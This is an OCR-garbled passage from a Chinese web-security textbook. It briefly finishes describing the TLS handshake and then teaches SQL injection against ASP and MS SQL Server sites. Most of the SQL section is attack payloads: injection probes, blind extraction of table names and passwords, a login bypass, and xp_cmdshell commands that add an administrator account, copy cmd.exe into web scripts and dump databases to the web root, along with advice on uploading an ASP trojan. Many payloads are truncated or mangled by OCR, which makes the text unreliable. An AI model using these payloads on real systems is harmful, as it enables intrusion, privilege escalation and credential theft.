(1) 一 个 随机 数 。 该 随机 数 用 服务 器 公 钥 加 密 ,防止 被 窃听 。 

(2) 编码 改变 通知 ,表示 随后 的 信息 都 将 用 双方 商定 的 加 密 方法 和 密 钥 发 送 。 

(3) 客户 端 握手 结束 通知 ,表示 客户 端的 握手 阶段 已 经 结束 。 这 一 项 同时 也 是 前 面 发 
送 的 所 有 内 容 的 Hash 值 , 用 来 供 服务 器 校 验 。 

上 面 第 一 项 的 随机 数 , 是 整个 握手 阶段 出 现 的 第 三 个 随机 数 ,又 称 pre-master key。 有 
了 它 以 后 ,客户 端 和 服务 器 就 同时 有 了 3 个 随机 数 ,接着 双方 就 用 事先 商定 的 加 密 方法 ,各 
自生 成 本 次 会 话 所 用 的 同一 把 “会 话 密 钥 ”。 

至 于 为 什么 一 定 要 用 3 个 随机 数 来 生成 “会 话 密 钥 ”,dog250 解释 得 很 好 : 

“不 管 是 客户 端 还 是 服务 器 ,都 需要 随机 数 ,这 样 生成 的 密 钥 才 不 会 每 次 都 一 样 。 由 于 
SSL 协议 中 证 书 是 静态 的 ,因此 十 分 有 必要 引入 一 种 随机 因素 来 保证 协商 出 来 的 密 钥 的 随机 性 。 

对 于 RSA 密 钥 交换 算法 来 说 ,pre-master-key 本 身 就 是 一 个 随机 数 , 再 加 上 hello 消息 
中 的 随机 ,3 个 随机 数 通过 一 个 密 钥 导出 器 最 终 导出 一 个 对 称 密 钥 。 

pre master 的 存在 在 于 SSL 协议 不 信任 每 个 主机 都 能 产生 完全 随机 的 随机 数 ,如 果 随 
机 数 不 随 机 ,那么 pre master secret 就 有 可 能 被 猜 出 来 ,那么 仅 适 用 pre master secret 作为 
密 钥 就 不 合适 了 ,因此 必须 引入 新 的 随机 因素 ,那么 客户 端 和 服务 器 加 上 pre master secret 
共 3 个 随机 数 一 同 生成 的 密 钥 就 不 容易 被 猜 出 了 ,一 个 伪 随 机 可 能 完全 不 随机 ,可 是 3 个 伪 
随机 就 十 分 接近 随机 了 ,每 增加 一 个 自由 度 ,随机 性 增加 的 可 不 是 一 。 

此 外 ,如 果 前 一 步 ,服务 器 要 求 客户 端 证 书 ,客户 端 会 在 这 一 步 发 送 证 书 及 相关 信息 。 

4) 第 四 次 通信 : 服务 器 的 最 后 应 答 

服务 器 收 到 客户 端的 第 三 个 随机 数 pre-master key 之 后 ,计算 生成 本 次 会 话 所 用 的 “会 
话 密 钥 ”。 然 后 向 客户 端 最 后 发 送 下 面 信息 。 

(1) 编码 改变 通知 ,表示 随后 的 信息 都 将 用 双方 商定 的 加 密 方法 和 密 钥 发 送 。 

(2) 服务 器 握手 结束 通知 ,表示 服务 器 的 握手 阶段 已 经 结束 。 这 一 项 同时 也 是 前 面 发 
送 的 所 有 内 容 的 Hash 值 , 用 来 供 客 户 端 校 验 。 

至 此 ,整个 握手 阶段 全 部 结束 。 接 下 来 ,客户 端 与 服务 器 进入 加 密 通信 ,就 完全 是 使 用 
普通 的 HTTP 协议 ,只 不 过 用 "会话 密 钥 " 加 密 内 容 。 





5.4 SQL 注入 攻防 


5.4.1 SQL 注入 攻击 的 定义 


SQL 注入 攻击 是 指 Web 应 用 程序 对 用 户 输入 数据 的 合法 性 没有 判断 ,攻击 者 可 以 在 
Web 应 用 程序 中 事先 定义 好 的 查询 语句 结尾 添加 额外 的 SQL 语句 ,以 此 来 实现 欺骗 数据 
库 服务 器 执行 非 授权 的 任意 查询 ,从 而 进一步 得 到 相应 的 数据 信息 。 

SQL 注入 攻击 威胁 的 表现 形式 为 : 绕 过 认证 ,获得 非法 权限 ; 猜 解 后 台数 据 库 全 部 的 
信息 ; 注入 可 以 借助 数据 库 的 存储 过 程 进 行 提 权 等 操作 。 

1. SQL 注入 攻击 的 典型 手段 

(1) 判断 应 用 程序 是 否 存在 SQL 注入 攻击 漏洞 。 常 用 的 判断 方法 有 : 


第 5 章 IP 安全 与 Web 安全 199 





© http: //www. heetian. com/showtail. asp? id=40" 

G@ http: //www. heetian. com/showtail. asp? id 一 40? and 1=1 

©® http: //www. heetian. com/showtail. asp? id=407? and 1=2 

如 果 执 行 @ 后 ,页 面 上 提示 报错 或 者 提示 数据 库 错误 的 话 , 说 明 存在 注入 漏洞 。 

如 果 执 行 @ 后 ,页 面 正 常 显示 ,而 执行 @ 后 ,页 面 报错 ,那么 说 明 这 个 页 面 存在 注入 
漏洞 。 

(2) 收集 信息 ,判断 数据 库 类 型 。 从 返回 信息 中 可 以 判断 数据 库 类 型 ,也 可 能 知道 部 分 
数据 库 中 的 字段 以 及 其 他 有 用 信息 ,为 下 一 步 攻击 提供 铺垫 。 

(3) 根据 注入 参数 类 型 , 重 构 SQL 语句 的 原貌 。 

Q@ ID=40 这 类 注入 的 参数 是 数字 型 ,那么 SQL 语句 的 原貌 大 致 是 : 

Select * from 表 名 where 字段 一 40 

@ name 一 电影 这 类 注入 的 参数 是 字符 型 ,SQL 语句 原貌 大 致 是 : 

Select x* from 表 名 where 字段 二 ' 电 影 ' 

@ 搜索 时 没有 过 滤 参 数 的 ,如 keyword 王 关键 字 ,SQL 语句 原貌 大 致 是 : 

Select * from 表 名 where 字段 like '% 关 键 字 %' 

(4) 猜 解 表 名 、 字 段 名 (直接 将 SQL 语句 添加 到 URL 后 ) 。 

Oz and exists(select * from 表 名 ): 如 果 页 面 没有 任何 变化 ,说 明 附加 条 件 成 立 ,那么 
就 说 明 猜 解 的 表 名 正确 ,反之 ,就 是 不 存在 这 个 表 , 接 下 来 就 继续 猜 解 ,直至 正确 。 

@ and exists(select 字段 from 表 名 ) : 方法 原理 同上 。 

@ 利用 以 上 猜 解 出 的 表 名 和 字段 名 猜 解 字段 内 容 。 

猜 解 字段 内 容 的 长 度 : 

(select top 1 len( 字 段 名 )from 表 名 ) 二 0 直至 猜 解 到 之 n 不 成 立 的 时 候 , 得 出 字段 的 长 
度 为 : n 十 1。 得 到 长 度 后 , 猜 解 具体 的 内 容 : 

(select top 1 asc(mid(username,1,1))from 表 名 ) 二 0 直到 之 m 不 成 立时 ,就 可 以 猜 解 
出 ASCII 码 值 了 。 

2. SQL 注入 攻击 产生 的 原因 

SQL 注入 攻击 是 指 利用 设计 上 的 漏洞 ,在 目标 服务 器 上 运行 SQL 语句 以 及 进行 其 他 
方式 的 攻击 。 

动态 生成 SQL 语句 时 ,不 对 用 户 输入 数据 进行 严格 验证 是 SQL 注入 攻击 得 佣 的 主要 
原因 。 例 如 有 SQL 语句 : "SELECT * FROM users WHERE Value= " 十 a_variable, 它 
的 功能 是 让 用 户 输入 一 个 员工 编号 a_variable 值 , 系 统 从 员工 表 users 中 查询 该 员工 信息 。 
如 果 攻 击 者 输入 a_variable 值 时 输入 : 'SA001'; drop table c_order--, 则 这 条 语句 在 执行 的 
时 候 就 变 为 了 SELECT * FROM users WHERE Value 一 'SA001'; drop table c_order--。 

这 条 动态 生成 SQL 语句 的 含义 是 : 'SA001' 后 的 分 号 表示 一 个 查询 的 结束 和 另 一 条 语 
名 的 开始 ; c_order 后 的 双 连 字符 "--" 指 示 当 前 行 余 下 的 部 分 是 一 个 注释 ,应 该 忽略 。 因 
此 系统 首先 执行 查询 语句 , 查 到 员工 编号 为 SA001 的 员工 信息 ; 然后 删除 表 c_order( 如 
果 没 有 其 他 主键 等 相关 约束 ) 结 束 。 操 作 破 坏 了 数据 库 内 容 的 完整 性 ,实现 了 SQL 注入 
攻击 。 
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3. SQL 注入 攻击 原理 

SQL 注入 能 使 攻击 者 绕 过 认证 机 制 , 完 全 控制 远程 服务 器 上 的 数据 库 。SQL 是 结构 化 
查询 语言 的 简称 , 它 是 访问 数据 库 的 事实 标准 。 目 前 ,大 多 数 Web 应 用 都 使 用 SQL 数据 库 
来 存放 应 用 程序 的 数据 。 几 乎 所 有 的 Web 应 用 在 后 台 都 使 用 某 种 SQL 数据 库 。 与 大 多 数 
语言 一 样 ,SQL 语法 允许 数据 库 命 令 和 用 户 数 据 混 杂 在 一 起 。 如 果 开 发 人 员 不 细心 的 话 ， 
用 户 数据 就 有 可 能 被 解释 成 命令 ,这 样 的 话 , 远 程 用 户 就 不 仅 能 向 Web 应 用 输入 数据 ,而 且 
还 可 以 在 数据 库 上 执行 任意 命令 了 。 


SQL 注入 攻击 的 主要 形式 有 两 种 : 
(1) 直接 注入 攻击 法 ,直接 将 代码 插入 到 与 SQL 命令 串联 在 一 起 并 使 其 得 以 执行 的 用 
户 输入 变量 。 


(2) 间接 攻击 方法 , 它 将 恶意 代码 注入 要 在 表 中 存储 或 者 作为 原 数据 存储 的 字符 串 。 
在 存储 的 字符 串 中 会 连接 到 一 个 动态 的 SQL 命令 中 ,以 执行 一 些 恶意 的 SQL 代码 。 注 入 
过 程 的 工作 方式 是 提前 终止 文本 字符 串 ,然后 追加 一 个 新 的 命令 。 

如 以 直接 注入 式 攻 击 为 例 。 就 是 在 用 户 输入 变量 的 时 候 , 先 用 一 个 分 号 结束 当前 的 请 
句 , 然 后 再 插入 一 个 恶意 SQL 语句 即 可 。 由 于 插入 的 命令 可 能 在 执行 前 追加 其 他 字符 串 ， 
因此 攻击 者 常常 用 注释 标记 “--” 来 终止 注入 的 字符 串 。 执 行 时 ,系统 会 认为 此 后 语句 为 注 
释 , 故 后 续 的 文本 将 被 忽略 ,不 被 编译 与 执行 。 


5.4.2 SQL 注入 攻击 的 思路 


SQL 注入 攻击 的 思路 包括 以 下 6 个 步骤 。 

1. 发 现 SQL 注入 攻击 位 置 

一 般 来 说 ,SQL 注入 攻击 一 般 存 在 于 形 如 : HTTP: //xxx. xxx. xxx/abc. asp? id 一 
XX 等 带 有 参数 的 ASP 或 者 动态 网 页 中 ,有 时 一 个 动态 网 页 中 可 能 只 有 一 个 参数 ,有 时 可 
能 有 N 个 参数 ,有 时 是 整 型 参数 ,有 时 是 字符 串 型 参数 。 总 之 只 要 是 带 有 参数 的 动态 网 页 
且 此 网 页 访问 了 数据 库 ,那么 就 有 可 能 存在 SQL 注入 攻击 。 如 果 程 序 员 没 有 安全 意识 ,不 
进行 必要 的 字符 过 滤 ,那么 存在 SQL 注入 攻击 的 可 能 性 就 非常 大 。 

为 了 全 面 了 解 动态 网 页 回答 的 信息 ,首先 请 调整 IE 的 配置 。 在 IE 的 菜单 栏 中 ,通过 
“工具 ”>“Internet 选项 ”命令 打开 “Internet 选项 ”对 话 框 ,在 “高 级 ”选项 卡 中 取消 选中 “ 显 
示 友 好 http 错误 信息 ” 复 选 框 。 

为 了 把 问题 说 明 清楚 ,以 下 以 HTTP: //xxx. xxx. xxx/abc. asp? p 王 YY 为 例 进行 分 
析 ,YY 可 能 是 整 型 ,也 有 可 能 是 字符 串 。 

1) 整 型 参数 的 判断 

当 输入 的 参数 YY 为 整 型 时 ,通常 abc. asp 中 SQL 语句 原貌 大 致 如 下 : select * from 
表 名 where 字段 二 YY, 所 以 可 以 用 以 下 步骤 测试 SQL 注入 攻击 是 否 存在 。 

@ HTTP: //xxx. xxx. xxx/abc. asp? p 王 YY'( 附 加 一 个 单 引 号 ) ,此 时 abc. ASP 中 的 
SQL 语句 变 成 了 select * from 表 名 where 字段 二 YY',abc. asp 运行 异常 ; 

@ HTTP: //xxx. xxx. xxx/abc. asp? p 一 YYandl 一 1,abc. asp 运行 正常 ,而 且 与 
HTTP: //xxx. xxx. xxx/abc. asp? p 二 YY 运行 结果 相同 ; 
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@ HTTP: //xxx. xxx. xxx/abc. asp? p 二 YYandl1 二 2,abc. asp 运行 异常 ; 如 果 以 上 3 
步 全 部 满足 ,那么 abc. asp 中 一 定 存 在 SQL 注入 攻击 漏洞 。 

2) 特殊 情况 的 处 理 

有 时 ASP 程序 员 会 在 程序 中 过 滤 掉 单 引 号 等 字符 ,以 防止 SQL 注入 攻击 。 此 时 可 以 
采用 以 下 几 种 方法 试 一 试 。 

(1) 大 小 定 混合 法 : 由 于 VBS 并 不 区 分 大 小 写 , 而 程序 员 在 过 滤 时 通常 要 么 全 部 过 滤 
大 写字 符 串 ,要 么 全 部 过 滤 小 写字 符 串 ,而 大 小 写 混合 往往 会 被 忽视 ,如 用 SelecT 代替 
select\SELECT 等 。 

(2) UNICODE 法 : 在 JIS 中 ,以 UNICODE 字符 集 实现 国际 化 ,我 们 完全 可 以 将 在 IE 
中 输入 的 字符 串 转化 成 UNICODE 字符 串 进 行 输入 ,如 十 三 %2B, 空 格 二 %20 等 。 

(3) ASCII 码 法 : 把 输入 的 部 分 或 全 部 字符 用 ASCII 码 代 替 , 如 U=chr(85),a=chr 
(97) 等 。 

2. 判断 后 台数 据 库 类 型 

一 般 来 说 , Access 与 SQL Server 是 最 常用 的 数据 库 服务 器 ,尽管 它们 都 支持 T-SQL 
标准 ,但 还 有 不 同 之 处 ,而 且 不 同 的 数据 库 有 不 同 的 攻击 方法 ,必须 要 区 别 对 待 。 

(1) 利用 数据 库 服务 器 的 系统 变量 进行 区 分 。SQL Server 有 user、db_name() 等 系统 
变量 ,利用 这 些 系统 值 不 仅 可 以 判断 SQL Server, 而 且 可 以 得 到 大 量 有 用 信息 。 如 : 

HTTP: //xxx. xxx. xxx/abc. asp? p 一 YYanduser 二 0 不仅 可 以 判断 是 否 是 SQL 
Server, 还 可 以 得 到 当前 连接 到 数据 库 的 用 户 名 。 

HTTP: //xxx. xxx. xxx/abc. asp? p 一 YY&n...db_name() 二 0 不 仅 可 以 判断 是 否 是 
SQL Server, 还 可 以 得 到 当前 正在 使 用 的 数据 库 名 。 

(2) 利用 系统 表 。Access 的 系统 表 是 msysobjects, 且 在 Web 环境 下 没有 访问 权限 ,而 
SQL Server 的 系统 表 是 sysobjects ,在 Web 环境 下 有 访问 权限 。 对 于 以 下 两 条 语句 ， 

HTTP: / /xxx. xxx. xxx/abc. asp?p = YY and (select count( * ) from sysobjects)> 0 

HTTP: //xxx. xxx. xxx/abc. asp?p = YY and (select count( * ) from msysobjects)> 0 
若 数 据 库 是 SQL Server, 则 第 一 条 abc. asp 一 定 运 行 正 常 , 第 二 条 则 异常 ; 若是 Access 则 
两 条 都 会 异常 。 

(3) MS SQL 的 3 个 关键 系统 表 。 

Sysdatabases 系统 表 : Microsoft SQL Server 上 的 每 个 数据 库 在 表 中 占 一 行 。 最 初 
安装 SQL Server 时 ,Sysdatabases 包含 master、model、msdb、mssqlweb、tempdb 数据 库 的 
项 。 该 表 只 存储 在 master 数据 库 中 ,保存 了 所 有 的 库 名 以 及 库 的 ID 和 一 些 相关 信息 。 

这 里 列 出 有 用 的 字段 名 称 和 相关 说 明 。name// 表 示 库 的 名 字 ; dbid// 表 示 库 的 ID; 
dbid 为 1 一 5 ,分 别 是 master、model、msdb、mssqlweb、tempdb 这 5 个 库 。 用 select * from 
master. dbo. Sysdatabases 就 可 以 查询 出 所 有 的 库 名 。 

@ Sysobjects: SQL Server 的 每 个 数据 库 内 都 有 此 系统 表 , 它 存放 该 数据 库 内 创建 的 
所 有 对 象 ,如 约束 、 默 认 值 . 日 志 、 规 则 、 存 储 过 程 等 ,每 个 对 象 在 表 中 占 一 行 。 

此 系统 表 的 字段 名 称 和 相关 说 明 : name、id、xtype、uid、status 分 别 是 对 象 名 、 对 象 ID、 
对 象 类 型 .所 有 者 对 象 的 用 户 ID 对象 状 态 (xtype) 。 
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xtype 一 'U'and status 二 0 代表 是 用 户 建立 的 表 , 对 象 名 就 是 表 名 ,对象 ID 就 是 表 的 ID 
值 。 用 select * from ChouYFD. dbo. sysobjects where xtype 一 'U'and status > 0 就 可 以 列 出 
库 ChouYFD 中 所 有 的 用 户 建 立 的 表 名 。 

@ Syscolumns: 每 个 表 和 视图 中 的 每 列 在 表 中 占 一 行 ,存储 过 程 中 的 每 个 参数 在 表 中 
也 占 一 行 。 该 表 位 于 每 个 数据 库 中 ,主要 字段 有 name,id、colid, 分 别 是 字段 名 称 、 表 ID 号 、 
字段 ID 号 ,其 中 的 ID 同 sysobjects 得 到 表 的 ID 号。 

用 select x from ChouYFD. dbo. syscolumns where id 二 123456789 可 以 得 到 ChouYFD 
这 个 库 中 表 的 ID 等 于 123456789 的 所 有 字段 列表 。 

3. 确定 XP_CMDSHELL 可 执行 情况 

若 当 前 连接 数据 的 账号 具有 SA 权限 , 且 master. dbo. xp_cmdshell 扩展 存储 过 程 ( 调 用 
此 存储 过 程 可 以 直接 使 用 操作 系统 的 shell) 能 够 正确 执行 , 则 整个 计算 机 可 以 通过 以 下 几 
种 方法 完全 控制 ,以 后 的 所 有 步骤 都 可 以 省 略 。 

(1) HTTP: //xxx. xxx. xxx/abc. asp? p= YY&nb...er 二 0 abc. asp 执行 异常 但 可 以 
得 到 当前 连接 数据 库 的 用 户 名 ( 若 显示 dbo, 则 代表 SA) 。 

(2) HTTP: //xxx. xxx. xxx/abc. asp? p 一 YY...me() 之 0 abc. asp 执行 异常 但 可 以 得 
到 当前 连接 的 数据 库 名 。 

(3) HTTP: //xxx. xxx. xxx/abc. asp? p 一 YY; 

exec master. xp_cmdshell"net user aaa bbb /add" 

master 是 SQL Server 的 主 数据 库 ; 名 中 的 分 号 表示 SQL Server 执行 完 分 号 前 的 语句 
名 ,继续 执行 其 后 面 的 语句 ; 可 以 直接 增加 操作 系统 账户 aaa, 密 码 为 bbb。 

(4) HTTP: //xxx. xxx. xxx/abc. asp? p 一 YY; 

exec master. . xp_cmdshell"net localgroup administrators aaa/add" 

把 刚刚 增加 的 账户 aaa 加 到 administrators 组 中 。 

(5) HTTP: //xxx. xxx. xxx/abc. asp? p 一 YY; 

backuup database 数据 库 名 to disk 王 'c: \inetpub\wwwroot\save. db' 

把 得 到 的 数据 内 容 全 部 备份 到 Web 目录 下 ,再 用 HTTP 下 载 此 文件 (当然 首选 要 知道 Web 
虚拟 目录 )。 

(6) 通过 复制 CMD 创建 UNICODE 漏洞 。 

HTTP: //xxx. xxx. xxx/abc. asp? p 一 YY; 

exe...dbo. xp_cmdshell"copy c: \winnt\system32\cmd. exe c: \inetpub\scripts\cmd. 


1 
exe 


制造 了 一 个 UNICODE 漏洞 ,利用 此 漏洞 . 便 完成 了 对 整个 计算 机 的 控制 (当然 首先 要 知道 
Web 虚拟 目录 )。 

4. 发 现 Web 虚拟 目录 

只 有 找到 Web 虚拟 目录 ,才能 确定 放置 ASP 木马 的 位 置 ,进而 得 到 USER 权限 。 有 两 
种 方法 比较 有 效 : 

(1) 根据 经 验 猜 解 。 

Web 虚拟 目录 是 : C: \inetpub\wwwroot; D: \inetpub\wwwroot; E: \inetpub\wwwroot 等 。 





第 5 章 IP 安全 与 Web 安全 203 





可 执行 虚拟 目录 是 : C: \inetpub\scripts; D: \inetpub\scripts; E: \inetpub\scripts 等 。 
(2) 遍历 系统 的 目录 结构 ,分 析 结 果 并 发 现 Web 虚拟 目录 。 

先 创建 一 个 临时 表 : temp。 

HTTP: //xxx. xxx. xxx/abc. asp?p = YY; 

creategn...mp(id?nvarchar (255), numl nvarchar(255), num2 nvarchar(255), num3 nvarchar (255)); 
接 下 来 : 

(1) 可 以 利用 xp_availablemedia 来 获得 当前 所 有 驱动 器 ,并 存 入 temp 表 中 


HTTP: //xxx. xxx. xxx/abc. asp?p = YY; insert temp...ter. dbo. xp_availablemedia; —— 


可 以 通过 查询 temp 的 内 容 来 获得 驱动 器 列表 及 相关 信息 。 

(2) 可 以 利用 xp_subdirs 获得 子 目录 列表 ,并 存 和 人 temp 表 中 : 

HTTP: //xxx. xxx. xxx/abc. asp?p = YY; insert into temp(i...dbo. xp_subdirs 'c:\'; -- 

(3) 还 可 以 利用 xp_dirtree 获得 所 有 子 目 录 的 目录 树 结 构 , 并 存 人 temp 表 中 。 

HTTP: //xxx. xxx. xxx/abc. asp?p = YY; insert into temp(id,numl ) exec master. dbo. xp_dirtree 'c:\'; 
这 样 就 可 以 成 功 地 浏览 到 所 有 的 目录 (文件 夹 ) 列 表 。 

如 果 需 要 查看 某 个 文件 的 内 容 , 可 以 通过 执行 xp_cmdsell: HTTP: //xxx. xxx. xxx/ 
abc. asp? p= YY;insert into temp(id) exec...nbsp; 'type c: \web\index. asp'; 使 用 'bulk 
insert' 语 法 可 以 将 一 个 文本 文件 插入 到 一 个 临时 表 中 。 如 bulk insert temp(id) from'c: \ 
inetpub\wwwroot\index. asp', 浏 览 temp 就 可 以 看 到 index. asp 文件 的 内 容 了 !。 通 过 分 析 
各 种 ASP 文件 ,可 以 得 到 大 量 系 统 信 息 、Web 建设 与 管理 信息 ,甚至 可 以 得 到 SA 账号 的 连 
接 密码 。 

当然 ,如 果 xp_cmshell 能 够 执行 , 则 可 以 用 它 来 完成 : 

HTTP: //xxx. xxx. xxx/abc. asp?p = YY; insert into?temp( id)&nbs...cmdshell 'dir c:\'; -一 

HTTP: / /wcx. we. wx/abc. asp?p = YY; insert into temp(id)gn...p_cmdshell 'dir c:\ * .asp /s/a'; —— 

通过 xp_cmdshell 可 以 看 到 所 有 想 看 到 的 ,包括 W3svc。 


HTTP: //xxx. xxx. xxx/abc. asp?p = YY; 
insert into temp(id) exec master. dbo. xp_cmdshe...ub\AdminScripts\adsutil. vbs enum w3svc' 


但 是 ,如 果 不 是 SA 权限 ,还 可 以 使 用 : 

HTTP: / /xpex. xxx. xxx/abc. asp?p = YY; insert into temp( id, numl) exec master. dbo. xp_dirtree 'c:\'; 
注意 

(1) 以 上 每 完成 一 项 浏览 后 ,应 删除 TEMP 中 的 所 有 内 容 .删除 方法 是 : 

HTTP: //xxx. xxx. xxx/abc. asp?p = YY; delete from temp; 一 一 


(2) 浏览 TEMP 表 的 方法 是 : (假设 TestDB 是 当前 连接 的 数据 库 名 ) 
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HTTP: //xxx. xxx. xxx/abc. asp?p = YY and (select top&...nbsp;TestDB. dbo. temp)>0 


得 到 TEMP 表 中 第 一 条 记录 id 字段 的 值 ,并 与 整数 进行 比较 ,显然 abc. asp 工作 异常 ,但 在 
异常 中 却 可 以 发 现 id 字段 的 值 。 假 设 发 现 的 表 名 是 xyz, 则 HTTP: //xxx. xxx. xxx/abc. 
asp? p 一 YY and (select top 1 id from ... ere id not in('"xyz)) 二 0 得 到 表 TEMP 中 第 二 条 
记录 id 字段 的 值 。 

5. 上 传 ASP 木马 

所 谓 ASP 木马 ,就 是 一 段 有 特殊 功能 的 ASP 代码 , 放 在 Web 虚拟 目录 的 Scripts 下 ， 
远程 客户 通过 IE 就 可 执行 它 , 进 而 得 到 系统 的 USER 权限 ,实现 对 系统 的 初步 控制 。 

上 传 ASP 木马 一 般 有 两 种 比较 有 效 的 方法 : 

第 一 种 方法 是 利用 Web 的 远程 管理 功能 。 许 多 Web 站 点 ,为 了 维护 方便 ,都 提供 了 远 
程 管理 的 功能 ; 也 有 不 少 Web 站 点 ,其 内 容 是 对 于 不 同 的 用 户 有 不 同 的 访问 权限 。 

为 了 达到 对 用 户 权限 的 控制 ,都 有 一 个 网 页 ,要求 输 入 用 户 名 与 密码 ,只 有 输入 了 正确 
的 值 ,才能 进行 下 一 步 的 操作 ,可 以 实现 对 Web 的 管理 ,如 上 传 . 下 载 文件 ,目录 浏览 ,修改 
配置 等 。 因 此 , 若 获取 正确 的 用 户 名 与 密码 ,不 仅 可 以 上 传 ASP 木马 ,有 时 甚至 能 够 直接 得 
到 USER 权限 而 浏览 系统 ,上 一 步 的 “发 现 Web 虚拟 目录 ”的 复杂 操作 都 可 省 略 。 

用 户 名 及 密码 一 般 存放 在 一 张 表 中 ,发现 这 张 表 并 读 取 其 中 内 容 便 解 决 了 问题 。 以 下 
给 出 两 种 有 效 方法 。 

(1) 注入 法 : 从 理论 上 说 ,认证 网 页 中 会 有 形 如 : select * from admin where username 一 
'XXX'and passWord 一 'YYY' 的 语句 , 若 在 正式 运行 此 句 之 前 ,没有 进行 必要 的 字符 过 滤 ， 
则 很 容易 实施 SQL 注入 攻击 。 

如 在 用 户 名 文本 框 内 输入 : abc'orl=1-- 在 密码 框 内 输入 : 123, 则 SQL 语句 变 成 : 
select * from admin where username 一 'abc'or 1 二 1 and password 一 '123', 不 管用 户 输入 什 
么 用 户 名 与 密码 ,此 语句 永远 都 能 正确 执行 ,用 户 轻易 骗 过 系统 ,获取 合法 身份 。 

(2) 猜 解 法 : 基本 思路 是 猜 解 所 有 数据 库 名称 , 猜 出 库 中 的 每 张 表 名 ,分 析 可 能 是 存放 
用 户 名 与 密码 的 表 名 , 猜 出 表 中 的 每 个 字段 名 , 猜 出 表 中 的 每 条 记录 内 容 。 

Q@ 猜 解 所 有 数据 库 名 称 。 

HTTP: //xxx. xxx. xxx/abc. asp? p 一 YY and (select count(* ) from master. dbo. 
Sysdatabases where name 二 1 and dbid 二 6)<>0 因为 dbid 的 值 为 1 一 5, 是 供 系 统 使 用 的 ,所 
以 用 户 自 己 建 的 一 定 是 从 6 开始 的 。 并 且 我 们 提交 了 name>1(Cname 字段 是 一 个 字符 型 的 
字段 和 数字 比较 会 出 错 ) ,abc. asp 工作 异常 ,可 得 到 第 一 个 数据 库 名 , 同 理 把 DBID 分 别 改 
成 7.8、9…… 就 可 得 到 所 有 数据 库 名 。 

以 下 假设 得 到 的 数据 库 名 是 TestDB。 

@ 猜 解 数据 库 中 用 户 名 表 的 名 称 。 

猜 解法 : 此 方法 就 是 根据 个 人 的 经 验 猜 表 名 ,一 般 来 说 ,为 user、 users、member、 
members、 userlist、memberlist、userinfo、manager、admin、adminuser、systemuser、 


systemusers,sysuser,sysusers,sysaccounts,systemaccounts 等 » 并 通过 语句 进行 判 断 
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HTTP: //xxx. xxx. xxx/abc.asp?p = YY and (select count( * ) from TestDB. dbo. 表 名 )>0 


若 表 名 存在 , 则 abc. asp 工作 正常 ,否则 异常 。 如 此 循环 ,直到 猜 到 系统 账号 表 的 名 称 。 

读 取 法 : SQL Server 有 一 个 存放 系统 核心 信息 的 表 sysobjects, 有 关 一 个 库 的 所 有 表 、 
视图 等 信息 全 部 存放 在 此 表 中 ,而且 此 表 可 以 通过 Web 进行 访问 。 

xtype 一 'U'and status 二 0 代表 用 户 建立 的 表 , 发 现 并 分 析 每 一 个 用 户 建立 的 表 及 名 称 ， 
便 可 以 得 到 用 户 名 表 的 名 称 ,基本 的 实现 方法 是 : 


HTTP: //wex. wx. wx/abc. asp?p = YY and (select top 1 name from TestD ... type= 'U'and status>0)>0 


得 到 第 一 个 用 户 建 表 的 名 称 , 并 与 整数 进行 比较 ,显然 abc. asp 工作 异常 ,但 在 异常 中 却 可 
以 发 现 表 的 名 称 。 假 设 发 现 的 表 名 是 xyz, 则 


HTTP: //xxx. xxx. xxx/abc. asp?p = YY and (select top 1 name from TestDB. dbo. sysobjects&...tatus > 
0 and name not in('xyz'))>0 


可 以 得 到 第 二 个 用 户 建立 的 表 的 名 称 , 同 理 就 可 得 到 所 有 用 户 建立 的 表 的 名 称 。 

根据 表 的 名 称 , 一 般 可 以 认定 那 张 表 是 用 户 用 来 存放 用 户 名 及 密码 的 ,以 下 假设 此 表 名 
为 Admin。 

G) 猜 解 用 户 名 字段 及 密码 字段 名 称 。 

admin 表 中 一 定 有 一 个 用 户 名 字段 ,也 一 定 有 一 个 密码 字段 ,只 有 得 到 此 两 个 字段 的 名 
称 , 才 有 可 能 得 到 此 两 字段 的 内 容 。 如 何 得 到 它们 的 名 称 呢 ? 同样 有 以 下 两 种 方法 。 

。 猜 解 法 : 此 方法 就 是 根据 个 人 的 经 验 猜 字段 名 ,一 般 来 说 ,用 户 名 字段 的 名 称 常用 
username name user account 等 , 而 密码 字段 的 名 称 常 用 password、 pass、pwd、 
passwd 等 。 并 通过 语句 

HTTP: / /xxx. xxx. xxx/abc. asp?p = YY and (select count( 字 段 名 ) from TestDB. dbo. admin)> 0?" 

select count( 字 段 名 ) from 表 名 " 


得 到 表 的 行 数 , 所 以 若 字段 名 存在 , 则 abc. asp 工作 正常 ,否则 异常 。 如 此 循环 ,直到 猜 到 两 
个 字段 的 名 称 。 

。 读 取 法 : 实现 方法 是 

HTTP: //xxx. xxx. xxx/abc. asp?p = YY and (select...me(object_id( 'admin'), 1) from TestDB. dbo. 

sysobjects)>0 

select top 1 col_name (object_id('admin'),1) from TestDB. dbo. sysobjects 是 从 
sysobjects 得 到 已 知 表 名 的 第 一 个 字段 名 , 当 与 整数 进行 比较 时 ,显然 abc. asp 工作 异常 ,但 
在 异常 中 却 可 以 发 现 字 段 的 名 称 。 把 col_name(object_id('admin'),1) 中 的 1 依次 换 成 2， 
3,4,5,6,… 就 可 得 到 所 有 的 字段 名 称 。 

@ 猜 解 用 户 名 与 密码 。 

猜 用 户 名 与 密码 的 内 容 最 常用 也 是 最 有 效 的 方法 是 ASCII 码 逐 字 解 码 法 ,虽然 这 种 方 
法 速度 较 慢 ,但 肯定 是 可 行 的 。 

基本 的 思路 是 先 猜 出 字段 的 长 度 , 然 后 依次 猜 出 每 一 位 的 值 。 猜 用 户 名 与 猜 密 码 的 方 
法 相同 ,以 下 以 猜 用 户 名 为 例 说 明 其 过 程 。 
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HTTP: //xxx. xxx. xxx/abc. asp?p = YY and (select topg&n...nbsp; 


from TestDB. dbo. admin) 一 X(X 二 1,2,3,4,5,…,n,username 为 用 户 名 字段 的 名 称 ， 
admin 为 表 的 名 称 ) , 若 X 为 某 一 值 i 且 abc. asp 运行 正常 时 , 则 i 就 是 第 一 个 用 户 名 的 长 
度 。 如 : 当 输 入 HTTP: //xxx. xxx. xxx/abc. asp? p 一 YY and (select top ... e) from 
TestDB. dbo. admin) 二 8 时 abc. asp 运行 正常 , 则 第 一 个 用 户 名 的 长 度 为 8。 

输入 HTTP: //xxx. xxx. xxx/abc. asp? p = YY and (sel ... ascii (substring 
(username,m,1)) from TestDB. dbo. admin) 二 n (m 的 值 在 1 到 上 一 步 得 到 的 用 户 名 长 度 
